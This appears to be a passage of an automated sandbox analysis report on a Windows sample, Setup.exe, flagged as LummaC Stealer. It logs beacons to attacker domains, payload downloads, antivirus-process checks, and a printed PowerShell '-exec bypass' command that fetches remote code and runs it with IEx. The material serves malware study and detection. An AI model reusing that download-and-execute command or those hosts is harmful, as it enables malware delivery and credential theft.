2025-01-01 18:04:14 UTC | 5092 | OUT | Data Raw: 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: M?lrQMn 64F6(X&7~`aO
2025-01-01 18:04:14 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:14 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ge46egb9u7gb0cp1p0u6pqt3sb; expires=Sun, 27 Apr 2025 11:50:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BiMZG7QN2JZioxLHfs93NwiKjXW25vbzpd8202baB%2BMV5HUrkL1%2FaiCzVGeua%2BhojNjUKJgpAXDBdEqBxUZG9MmiuW2SuD4gYa7SWQwgdQezfdP7SIZ82NZLqrLPOwHhxTFXzE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e3d99d043b2-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1612&rtt_var=616&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21385&delivery_rate=1761158&cwnd=238&unsent_bytes=0&cid=27bc41abd7c6a712&ts=634&x=0"
2025-01-01 18:04:14 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2025-01-01 18:04:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49739 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:15 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=JMD9W24D8L9AG
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1237
                                                                                                                                                                                                                                                            Host: abberanteusz.click
2025-01-01 18:04:15 UTC | 1237 | OUT | Data Ascii: --JMD9W24D8L9AGContent-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--JMD9W24D8L9AGContent-Disposition: form-data; name="pid"1--JMD9W24D8L9AGContent-Disposition: form-data; name="lid"hRjzG3--GAS--JMD9W24D8L9AG
2025-01-01 18:04:16 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 18:04:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=33cso8pe8so0liiu8cl2936iei; expires=Sun, 27 Apr 2025 11:50:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZIz3ZrgU36%2BTFOlSK6BrW3%2FH0f5QQDMrf4VKaAChPmXHGRgHjkCwo2abo8jBRMIBMQXYuHZZqOmQ0dDgcpLliYzJlVWMMBPPSQ8FJmGZyQpCF9HcEjvEp5%2B7QWO7H5HK1shYmCk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb46e466ddb41c1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2229&min_rtt=2227&rtt_var=840&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2151&delivery_rate=1299510&cwnd=205&unsent_bytes=0&cid=023f2f38703ceb13&ts=489&x=0"
2025-01-01 18:04:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-01 18:04:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:17 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=51VOM22OB4VHWV7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1078
Host: abberanteusz.click
2025-01-01 18:04:17 UTC | 1078 | OUT | Data Ascii: --51VOM22OB4VHWV7Content-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--51VOM22OB4VHWV7Content-Disposition: form-data; name="pid"1--51VOM22OB4VHWV7Content-Disposition: form-data; name="lid"hRjzG3--GAS--51VOM22
2025-01-01 18:04:17 UTC | 1132 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 18:04:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c9bfcito1s8lnvqffrmls89cmv; expires=Sun, 27 Apr 2025 11:50:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmOLhvfPHrhx07DBX4jTiKuEplqZVO9rjpQxFgmM3HPckfJ3LJ6AcsmaUU6IVv%2FeewMp64hPB8OTdf6VXpohZC%2BopapOl2lK7g1LUF0tRhI729%2FICOPGrObEfIn%2FK5%2FhmHDeWYU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb46e4ee8cd726e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2053&min_rtt=2048&rtt_var=778&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1994&delivery_rate=1397797&cwnd=224&unsent_bytes=0&cid=5eee75af1566dea9&ts=531&x=0"
2025-01-01 18:04:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-01 18:04:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:18 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 112
Host: abberanteusz.click
2025-01-01 18:04:18 UTC | 112 | OUT | Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=6C50DBF4E642EF22C8E4375D48A51916
2025-01-01 18:04:18 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 18:04:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=feoo4svc8jp9em7glpb539qpcj; expires=Sun, 27 Apr 2025 11:50:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Krp%2FLX%2BYMCQ%2BVfopEwQrPI2vtfc2jAzYXp5moByjb9ZW0iTVub4a8Zw9%2FCjJaWwTVR7z3SCRl6hUnV68OjIp1NQ8V8BgNFx%2F%2FWZzHvdhzk9aHaXMJxSFUpybr8qEFOjiwFH%2F720%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb46e5599fa43b6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1632&rtt_var=816&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=1015&delivery_rate=160404&cwnd=224&unsent_bytes=0&cid=0cae9e0ac9986542&ts=552&x=0"
2025-01-01 18:04:18 UTC | 218 | IN | Data Ascii: d40D4dAczo8KjTKz1+aSO90XuqZsXMUXKlLiQFa7SH0rSLRT907tLSwKdfTQ1Tf5KNVMkDorl/Ac1BVFlEjLLlgOIILzX43qyHo0MTChFXn/1ZzBLn9mNeh0sGP1rJq6mWpRwnI6SchNigEWFRNQzWvRLaELChOAHQRwp2A9v3jpu5UGler4SA96BDXFAdW8nzV4gAse5rQokMQSdRhPqP
                                                                                                                                                                                                                                                            2025-01-01 18:04:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 185.161.251.21 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:19 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: cegu.shop
2025-01-01 18:04:19 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:19 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 329
                                                                                                                                                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
2025-01-01 18:04:19 UTC | 329 | IN | Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49745 | 104.21.37.128 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:20 UTC | 206 | OUT | GET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: klipvumisui.shop
2025-01-01 18:04:20 UTC | 908 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:20 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 8767044
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                                            Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKZlM2C4C6K1gT6j%2Fhm3oaTPjYLme%2FoEl1xPJdGhTG1pDaeudKbw4KsuSwvVe%2FBJsgHbeIAaHASA3bNODhY%2FPebJEjEgm%2BsTThPmgICNvNYrwJXtouM9r%2Ba3QGZ52Rm7V2TQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e634bc7434a-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6526&min_rtt=1651&rtt_var=3672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=1768625&cwnd=228&unsent_bytes=0&cid=db08ea884558f3b1&ts=310&x=0"
2025-01-01 18:04:20 UTC | 1369 | IN | Data Ascii: MZP@!L!This program must be run under Win32$7



Target ID:0
Start time:13:03:55
Start date:01/01/2025
Path:C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Setup.exe"
Imagebase:0x400000
File size:1'543'377 bytes
MD5 hash:F24FCF422C2611892A30ADF91D85F556
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:2
Start time:13:04:19
Start date:01/01/2025
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
Imagebase:0x70000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:13:04:19
Start date:01/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:13:04:27
Start date:01/01/2025
Path:C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
Imagebase:0x840000
File size:8'767'044 bytes
MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 53%, ReversingLabs
Reputation:low
Has exited:true

Target ID:7
Start time:13:04:28
Start date:01/01/2025
Path:C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$20460,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
Imagebase:0x9e0000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:8
Start time:13:04:30
Start date:01/01/2025
Path:C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
Imagebase:0x840000
File size:8'767'044 bytes
MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low
Has exited:true

Target ID:9
Start time:13:04:30
Start date:01/01/2025
Path:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$B0060,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
Imagebase:0x800000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:10
Start time:13:04:56
Start date:01/01/2025
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:"timeout" 9
Imagebase:0x7ff796770000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:13:04:56
Start date:01/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Imagebase:0x7ff675890000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:0x7ff7b65d0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "wrsa.exe"
Imagebase:0x7ff701940000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Imagebase:0x7ff675890000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:0x7ff7699e0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:13:05:05
Start date:01/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "opssvc.exe"
Imagebase:0x7ff701940000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff675890000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "avastui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
